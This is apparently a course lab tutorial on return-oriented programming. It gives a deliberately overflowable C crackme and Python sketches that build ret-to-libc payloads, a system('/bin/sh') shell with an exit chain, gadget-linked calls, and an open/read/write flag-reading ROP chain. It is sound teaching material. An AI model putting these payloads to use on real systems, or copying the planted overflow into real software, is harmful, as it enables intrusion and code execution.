==================================
Lec07: Return-oriented Programming
==================================

In this tutorial, we are going to learn about the basic concept of
return-oriented programming (ROP).

1. Ret-to-libc
==============

To make our tutorial easier, we assume there are code pointer leaks
(i.e., system() and printf() in the libc library).

------------------------------------------------------------
#include <dlfcn.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

void start() {
  printf("IOLI Crackme Level 0x00\n");
  printf("Password:");

  char buf[32];
  memset(buf, 0, sizeof(buf));
  read(0, buf, 256);  /* reads up to 256 bytes into a 32-byte buffer */
  
  if (!strcmp(buf, "250382"))
    printf("Password OK :)\n");
  else
    printf("Invalid Password!\n");
}

int main(int argc, char *argv[])
{
  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stdin, NULL, _IONBF, 0);
  
  void *self = dlopen(NULL, RTLD_NOW);
  printf("stack   : %p\n", &argc);
  printf("system(): %p\n", dlsym(self, "system"));
  printf("printf(): %p\n", dlsym(self, "printf"));

  start();
  
  return 0;
}
------------------------------------------------------------

  $ checksec ./target
   [*] '/home/lab/tut-rop/target'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

Please note that NX is enabled, so you cannot execute shellcode placed
on the stack or the heap. The stack protector, however, is disabled,
which allows us to launch a control-hijacking attack.

  $ ./target
  stack   : 0xffea0e00
  system(): 0xf7e5e310
  printf(): 0xf7e6b410
  IOLI Crackme Level 0x00
  Password:

Your first task is to exploit the buffer overflow and print out
"Password OK :)". (How could you find the pointer to "Password OK :)"?)

Your payload should look like this:

  [buf  ]
  [.....]
  [ra   ] -> printf
  [dummy]
  [arg1 ] -> "Password OK :)"

When printf() is invoked, "Password OK :)" will be considered as its
first argument. As this exploit returns to a libc function, this
technique is often called "ret-to-libc".
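
The layout above can be sketched in Python as follows. This is only a
minimal sketch, not the intended solution: OFFSET_TO_RA and
PASSWORD_OK_ADDR are hypothetical placeholders that you have to
recover yourself (e.g., with a debugger), and the printf() address is
the one from the sample run, which differs on every execution.

```python
import struct

def p32(value):
    """Pack a 32-bit value as little-endian bytes (i386 is little-endian)."""
    return struct.pack("<I", value)

def ret_to_libc(func_addr, arg1, offset_to_ra, next_ra=0x42424242):
    """Build [padding][ra -> func][dummy][arg1] as drawn in the diagram."""
    payload = b"A" * offset_to_ra   # fills buf and everything up to the saved ra
    payload += p32(func_addr)       # overwritten return address
    payload += p32(next_ra)         # 'dummy': where func itself would return to
    payload += p32(arg1)            # first argument as seen by func
    return payload

OFFSET_TO_RA = 44               # hypothetical: distance from buf to the saved ra
PRINTF_ADDR = 0xf7e6b410        # from the sample run above; differs per run
PASSWORD_OK_ADDR = 0x0804a008   # hypothetical: address of "Password OK :)"

payload = ret_to_libc(PRINTF_ADDR, PASSWORD_OK_ADDR, OFFSET_TO_RA)
print(payload.hex())
```

Since the target reads its input with read(), NUL bytes inside the
packed addresses are not a problem here.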


2. Understanding module
=======================

Let's get a shell out of this vulnerability. To get a shell, we are
going to use the system() function (try 'man system' if you are not
familiar with it).

Like the above payload, you can easily place the pointer to system()
by replacing printf() with system().

  [buf  ]
  [.....]
  [ra   ] -> system
  [dummy]
  [arg1 ] -> "/bin/sh"

But what's the pointer to "/bin/sh"? In fact, typical process memory
(and libc) contains lots of such strings (e.g., various shells). Think
about how the system() function is implemented; it essentially calls
fork() and execve() on "/bin/sh" with the provided argument.

gdb-pwndbg provides a pretty easy interface to search for a string in memory:

  $ gdb-pwndbg ./target
  ...
  > search  "/bin"
  libc-2.19.so    0xf7f80d4c das     /* '/bin/sh' */
  libc-2.19.so    0xf7f82790 das     /* '/bin:/usr/bin' */
  libc-2.19.so    0xf7f82799 das     /* '/bin' */
  libc-2.19.so    0xf7f82ccd das     /* '/bin/csh' */
  ...

There are a bunch of strings you can pick to feed to the system()
function as an argument. Note that all of these pointers differ
across executions because of ASLR on the stack, heap, and libraries.

Our goal is to invoke system("/bin/sh"), like this:

  [buf  ]
  [.....]
  [ra   ] -> system (provided: 0xf7e5e310)
  [dummy]
  [arg1 ] -> "/bin/sh" (searched: 0xf7f80d4c)

Unfortunately, these numbers keep changing. How can we infer the
address of "/bin/sh" required for system()? As you've learned from the
'libbase' challenge in Lab06, ASLR does not randomize the offsets
inside a module; it just randomizes the base address of the entire
module (why though?).

  0xf7f80d4c (/bin/sh) - 0xf7e5e310 (system) = 0x122a3c

So in your exploit, by using the address of system(), you can calculate
the address of "/bin/sh" (0xf7f80d4c = 0xf7e5e310 + 0x122a3c).
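
As a minimal sketch of this calculation, the snippet below parses the
leak printed by the target and adds the fixed distance. The helper
names (parse_leak, binsh_from_system) are made up for illustration,
and the distance is only valid for the libc build used in the sample
run.

```python
import re

# Distance between "/bin/sh" and system() inside libc, from the sample run.
SYSTEM_TO_BINSH = 0xf7f80d4c - 0xf7e5e310   # 0x122a3c for this libc build

def parse_leak(banner, name):
    """Extract the hex address printed as '<name>: 0x...' by the target."""
    match = re.search(re.escape(name) + r"\s*:\s*(0x[0-9a-fA-F]+)", banner)
    if match is None:
        raise ValueError("no leak found for " + name)
    return int(match.group(1), 16)

def binsh_from_system(system_addr):
    """Apply the fixed in-module distance to a freshly leaked system()."""
    return (system_addr + SYSTEM_TO_BINSH) & 0xffffffff

# Output of the sample run above; a real exploit reads this from the process.
banner = "stack   : 0xffea0e00\nsystem(): 0xf7e5e310\nprintf(): 0xf7e6b410\n"
system_addr = parse_leak(banner, "system()")
print(hex(binsh_from_system(system_addr)))   # 0xf7f80d4c
```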

Try?

By the way, where is this magic address (0xf7e5e310, the address of
system()) coming from? In fact, you can easily compute it by hand. Try
"vmmap" in gdb-pwndbg:

  > vmmap
  LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
  0x56555000 0x56556000 r-xp     1000 0      /home/lab06/tut-rop/target
  0x56556000 0x56557000 r--p     1000 0      /home/lab06/tut-rop/target
  0x56557000 0x56558000 rw-p     1000 1000   /home/lab06/tut-rop/target
  0xf7e1d000 0xf7e1e000 rw-p     1000 0      
  0xf7e1e000 0xf7fc9000 r-xp   1ab000 0      /lib/i386-linux-gnu/libc-2.19.so
  0xf7fc9000 0xf7fcb000 r--p     2000 1aa000 /lib/i386-linux-gnu/libc-2.19.so
  0xf7fcb000 0xf7fcc000 rw-p     1000 1ac000 /lib/i386-linux-gnu/libc-2.19.so
  ...

The base address (a mapped region) of libc is '0xf7e1e000'; "x" in
the "r-xp" permission is telling you that's an eXecutable region
(i.e., code).

Then, where is system() in the library itself? As these functions are
exported for external use, you can parse the ELF format like below:

   $ readelf -s /lib/i386-linux-gnu/libc-2.19.so | grep system
   243: 0011b8a0    73 FUNC    GLOBAL DEFAULT   12 svcerr_systemerr@@GLIBC_2.0
   620: 00040310    56 FUNC    GLOBAL DEFAULT   12 __libc_system@@GLIBC_PRIVATE
  1443: 00040310    56 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.0

0x00040310 is the beginning of the system() function inside the libc
library, so its base address plus 0x00040310 should be the address we
observed previously.

  0xf7e1e000 (base) + 0x00040310 (offset) = 0xf7e5e310 (system)

Then, can you calculate the base of the library from the leaked
address of system()? And what's the offset of "/bin/sh" in the libc
module?
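
One way to check your answers is sketched below. It assumes the
numbers from the sample run, and it assumes that the string lives in
the mapping with file offset 0 (as in the vmmap output above), so that
its offset in the file equals its offset from the base. The
string_offset helper and the fake image are hypothetical stand-ins; on
a real system you would pass the bytes of the libc file instead.

```python
SYSTEM_OFFSET = 0x00040310   # offset of system() from the readelf output

def libc_base_from_system(system_addr):
    """Undo 'base + offset = system' to recover the randomized libc base."""
    base = system_addr - SYSTEM_OFFSET
    if base & 0xfff:
        # Mappings are page-aligned, so a correct base ends in 0x000.
        raise ValueError("base is not page-aligned; wrong leak or wrong libc?")
    return base

def string_offset(image, text):
    """Offset of the NUL-terminated string `text` in raw bytes, or -1."""
    return image.find(text + b"\x00")

base = libc_base_from_system(0xf7e5e310)
print(hex(base))                 # 0xf7e1e000, matching the vmmap output
print(hex(0xf7f80d4c - base))    # offset of "/bin/sh" in the sample run

# Hypothetical stand-in for the bytes of libc, so the sketch runs anywhere.
fake_image = b"\x7fELF" + b"\x00" * 12 + b"/bin/sh\x00"
print(string_offset(fake_image, b"/bin/sh"))
```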


3. Simple ROP
=============

Generating a segfault after exploitation is a bit unfortunate, so
let's make it gracefully terminate after the exploitation. Our plan
is to 'chain' two library calls, like this:

   system("/bin/sh")
   exit(0)

Let's think about what happens when system("/bin/sh") returns; that is,
when you exit the shell (type 'exit' or C-c).

  [buf  ]
  [.....]
  [ra   ] -> system
  [dummy]
  [arg1 ] -> "/bin/sh"

Did you notice that the 'dummy' value is the last ip at which the
program crashed? In other words, similar to stack overflows, you can
keep controlling the next return addresses by chaining them. What if
we place the address of exit() in 'dummy'?

  [buf      ]
  [.....    ]
  [old-ra   ] -> 1) system
  [ra       ] -------------------> 2) exit
  [old-arg1 ] -> 1) "/bin/sh"
  [arg1     ] -> 0

When system() returns, exit() will be invoked; perhaps you can even
control its argument like above (arg1 = 0). 

Try? You should be able to find the address of exit() as in the
previous example.
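
A minimal sketch of the two-call payload, assuming the addresses from
the sample run. EXIT_OFFSET and OFFSET_TO_RA are hypothetical
placeholders: look up the real offset of exit() with readelf, as done
for system(), and find the distance to the saved return address
yourself.

```python
import struct

def p32(value):
    """Pack a 32-bit value as little-endian bytes."""
    return struct.pack("<I", value & 0xffffffff)

def system_then_exit(system_addr, exit_addr, binsh_addr, offset_to_ra, status=0):
    """Lay out system("/bin/sh") followed by exit(status) as in the diagram."""
    payload = b"A" * offset_to_ra
    payload += p32(system_addr)   # old-ra:   1) system
    payload += p32(exit_addr)     # ra:       2) exit, used when system() returns
    payload += p32(binsh_addr)    # old-arg1: argument of system()
    payload += p32(status)        # arg1:     argument of exit()
    return payload

LIBC_BASE = 0xf7e1e000     # from the vmmap output of the sample run
SYSTEM_ADDR = 0xf7e5e310   # leaked by the target in the sample run
BINSH_ADDR = 0xf7f80d4c    # found with 'search' in the sample run
EXIT_OFFSET = 0x00033000   # hypothetical: look up the real one with readelf
OFFSET_TO_RA = 44          # hypothetical: distance from buf to the saved ra

payload = system_then_exit(SYSTEM_ADDR, LIBC_BASE + EXIT_OFFSET,
                           BINSH_ADDR, OFFSET_TO_RA)
print(payload.hex())
```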

Unfortunately, this chaining scheme stops after the second call. This
week, you will be learning a more generic and powerful technique to
keep extending your payloads, so-called return-oriented programming
(ROP).

Think about:

  [buf      ]
  [.....    ]
  [old-ra   ] -> 1) func1
  [ra       ] -------------------> 2) func2
  [old-arg1 ] -> 1) arg1
  [arg1     ] -> arg1

After func2(arg1), 'old-arg1' will be our next return address in this
payload. Here comes a neat trick, a pop/ret gadget.

  [buf      ]
  [.....    ]
  [old-ra   ] -> 1) func1
  [ra       ] ------------------> pop/ret gadget
  [old-arg1 ] -> 1) arg1
  [ra       ] -> func2
  [dummy    ] 
  [arg1     ] -> arg1

In this case, after func1(arg1), it returns to the 'pop/ret'
instructions, which 1) pop 'old-arg1' off the stack and 2) return to
func2 (again!).

Although 'pop/ret' gadgets are everywhere (check any function!), there
is a useful tool that searches for all the interesting gadgets for you.

  $ ropper -f ./target 
  ....
  0x0804901e: pop ebx; ret;
  ....
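
To get a feeling for what such a tool looks for, here is a toy scanner
for pop/ret sequences. It is only a sketch: it relies on the i386
encodings 'pop r32' = 0x58..0x5f and 'ret' = 0xc3, runs on a made-up
byte string with a made-up base address, and ignores everything a real
tool handles (sections, load addresses, other instructions).

```python
POP_REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
POP_ESP = 0x5c   # skipped: 'pop esp' moves the stack pointer itself
RET = 0xc3

def is_plain_pop(byte):
    """True for a one-byte 'pop r32' other than 'pop esp'."""
    return 0x58 <= byte <= 0x5f and byte != POP_ESP

def find_pop_ret(code, base=0, pops=1):
    """Yield (address, text) for `pops` pop instructions followed by ret."""
    for i in range(len(code) - pops):
        window = code[i:i + pops]
        if all(is_plain_pop(b) for b in window) and code[i + pops] == RET:
            names = ["pop " + POP_REGS[b - 0x58] for b in window]
            yield base + i, "; ".join(names) + "; ret;"

# Made-up bytes: nop; pop ebx; ret; pop esi; pop edi; ret
sample = bytes.fromhex("905bc35e5fc3")
SAMPLE_BASE = 0x1000   # hypothetical load address

for address, text in find_pop_ret(sample, base=SAMPLE_BASE, pops=1):
    print(hex(address) + ": " + text)
for address, text in find_pop_ret(sample, base=SAMPLE_BASE, pops=2):
    print(hex(address) + ": " + text)
```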

By using this 'gadget', we can keep chaining multiple functions
together like this:

  [buf      ]
  [.....    ]
  [old-ra   ] -> 1) func1
  [ra       ] ------------------> pop/ret gadget
  [old-arg1 ] -> 1) arg1
  [ra       ] -> func2
  [ra       ] ------------------> pop/pop/ret gadget
  [arg1     ] -> arg1
  [arg2     ] -> arg2
  [ra       ] ...

To invoke:

  func1(arg1)
  func2(arg1, arg2)
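
The pattern generalizes to any number of calls. Below is a minimal
sketch of a chain builder, assuming a table that maps "number of
arguments" to a gadget that pops that many words and returns. Only the
'pop ebx; ret' address comes from the ropper output above; the
pop/pop/ret address and the function and argument values are
hypothetical placeholders.

```python
import struct

DUMMY = 0x42424242   # return address of the last call; never meant to be used

def p32(value):
    """Pack a 32-bit value as little-endian bytes."""
    return struct.pack("<I", value & 0xffffffff)

def rop_chain(calls, pop_gadgets):
    """calls: list of (func_addr, [args]); pop_gadgets: {n_args: gadget_addr}."""
    chain = b""
    for index, (func, args) in enumerate(calls):
        chain += p32(func)
        if index == len(calls) - 1:
            chain += p32(DUMMY)                    # nothing left to chain
        elif args:
            chain += p32(pop_gadgets[len(args)])   # skips over this call's args
        # With no args, the next function's address is the return address.
        for arg in args:
            chain += p32(arg)
    return chain

POP_GADGETS = {
    1: 0x0804901e,   # pop ebx; ret (from the ropper output above)
    2: 0x0804901d,   # hypothetical address of a pop/pop/ret gadget
}
FUNC1, FUNC2 = 0x11111111, 0x22222222   # hypothetical function addresses
ARG1, ARG2 = 0x33333333, 0x44444444     # hypothetical argument values

chain = rop_chain([(FUNC1, [ARG1]), (FUNC2, [ARG1, ARG2])], POP_GADGETS)
print(chain.hex())
```

In this example func2 is the last call, so its return address is a
dummy; append more calls to the list and it receives the pop/pop/ret
gadget instead, as in the diagram.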

Try to invoke:

  printf("Password OK :)")
  system("/bin/sh")
  exit(0)

In fact, this is just the basic idea. After executing 'pop ebx; ret;',
you are now controlling the value of a register (ebx = arg1), which
means you can do a bunch of other things (e.g., invoking system
calls). Not surprisingly, this kind of technique turns out to be
Turing-complete (see our reference).

You know what? All gadgets end with "ret", hence the name
"return"-oriented programming.

4. Simple ROP
=============

Your job today is to chain a ROP payload:

  open("/proc/flag", O_RDONLY)
  read(3, tmp, 1024)
  write(1, tmp, 1024)

More specifically, prepare the payload:

  [buf      ]
  [.....    ]
  [ra       ] -> 1) open
  [pop2     ] ------------------> pop/pop/ret
  [arg1     ] -> "/proc/flag"
  [arg2     ] -> 0 (O_RDONLY)
  [ra       ] -> 2) read
  [pop3     ] ------------------> pop/pop/pop/ret
  [arg1     ] -> 3 (new fd)
  [arg2     ] -> tmp
  [arg3     ] -> 1024
  [ra       ] -> 3) write
  [dummy    ]
  [arg1     ] -> 1 (stdout)
  [arg2     ] -> tmp
  [arg3     ] -> 1024

1) tmp? Any writable place in the program? (i.e., check vmmap)
2) "/proc/flag"? Any place on the stack where you can inject such a
   string as part of your buffer input (i.e., use the leaked "stack"
   address)
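
As a sketch of how the pieces fit together, the snippet below lays out
the three calls and appends the "/proc/flag" string after the chain,
where the stack frames of the called functions (which grow below the
chain) cannot overwrite it. Every address here is a hypothetical
placeholder, including BUF_ADDR, which you would derive from the
leaked "stack" value; the fd value 3 is the assumption made in the
diagram above.

```python
import struct

def p32(value):
    """Pack a 32-bit value as little-endian bytes."""
    return struct.pack("<I", value & 0xffffffff)

def flag_payload(addr, buf_addr, offset_to_ra, tmp_addr, size=1024):
    """Chain open/read/write and store the path string right after the chain."""
    n_words = 14
    path_addr = buf_addr + offset_to_ra + 4 * n_words   # just past the chain
    words = [
        addr["open"], addr["pop2"], path_addr, 0,          # open(path, O_RDONLY)
        addr["read"], addr["pop3"], 3, tmp_addr, size,     # read(3, tmp, size)
        addr["write"], 0x42424242, 1, tmp_addr, size,      # write(1, tmp, size)
    ]
    assert len(words) == n_words
    chain = b"".join(p32(word) for word in words)
    return b"A" * offset_to_ra + chain + b"/proc/flag\x00"

# All values below are hypothetical placeholders for illustration only.
ADDR = {
    "open": 0x11111111, "read": 0x22222222, "write": 0x33333333,
    "pop2": 0x44444444, "pop3": 0x55555555,
}
BUF_ADDR = 0xffea0d00   # hypothetical: start of buf, derived from the leak
TMP_ADDR = 0x0804c800   # hypothetical: some writable address (check vmmap)
OFFSET_TO_RA = 44       # hypothetical: distance from buf to the saved ra

payload = flag_payload(ADDR, BUF_ADDR, OFFSET_TO_RA, TMP_ADDR)
print(len(payload), "bytes; must fit within the 256 bytes read by the target")
```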

Please exploit ./target-seccomp with your payload and submit the flag!